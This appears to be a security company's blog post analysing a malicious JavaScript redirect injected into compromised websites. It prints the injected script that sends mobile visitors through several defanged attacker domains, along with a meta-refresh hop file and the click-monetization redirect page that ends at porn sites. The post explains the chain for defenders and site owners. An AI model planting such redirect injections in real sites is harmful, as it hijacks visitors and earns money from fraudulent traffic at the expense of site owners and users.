Attackers will do desperate and obvious things to boost the views of their ‘customers’.
On a daily basis we find different malicious redirects (some are very well hidden, others not so much).
The case with this JavaScript redirect is not so different than the other malicious redirects out there, except for one thing – it is constructed from multiple redirects via multiple servers in order for the attacker to gather statistics and monetize the ‘clicks’ from the scripts.
<script type="text/javascript">if (screen.width <= 480) {window.location = "hxxp://portal-b[.]pw/XcTyTp";}</script>
This is a simple JavaScript injection that redirects you to ‘Free porn web cams’ if your device screen width size is equal or less than 480px. Most of the mobile phones out there will be affected.
The interesting part of this malicious redirect is that during each different execution, it redirects you to another website where another malicious script is hosted, and then you are redirected to the monetization platform which redirects you to a random porn website.
hxxp://infectedsite[.]dom/wp-content/js/js.html (compromised website used as jump point to the below URL)
The content of the js.html is this:
<meta http-equiv="refresh" content="0;URL=hxxp://portal-b[.]pw/X9DC2z"/>
After the next redirect, the shortened URL sends you to a malicious click monetization website:
<html> <head> <meta http-equiv="REFRESH" content="1; URL='hxxp://click-cpa[.]net/out?zoneId=1466739-1466890'"> <script type="text/javascript">window.location = "hxxp://click-cpa[.]net/out?zoneId=1466739-1466890";</script> </head> </html>
And voila! You are redirected to a random porn website from their list and generating some cents for the attacker.
If your website has been infected and need some help cleaning it up, please let us know.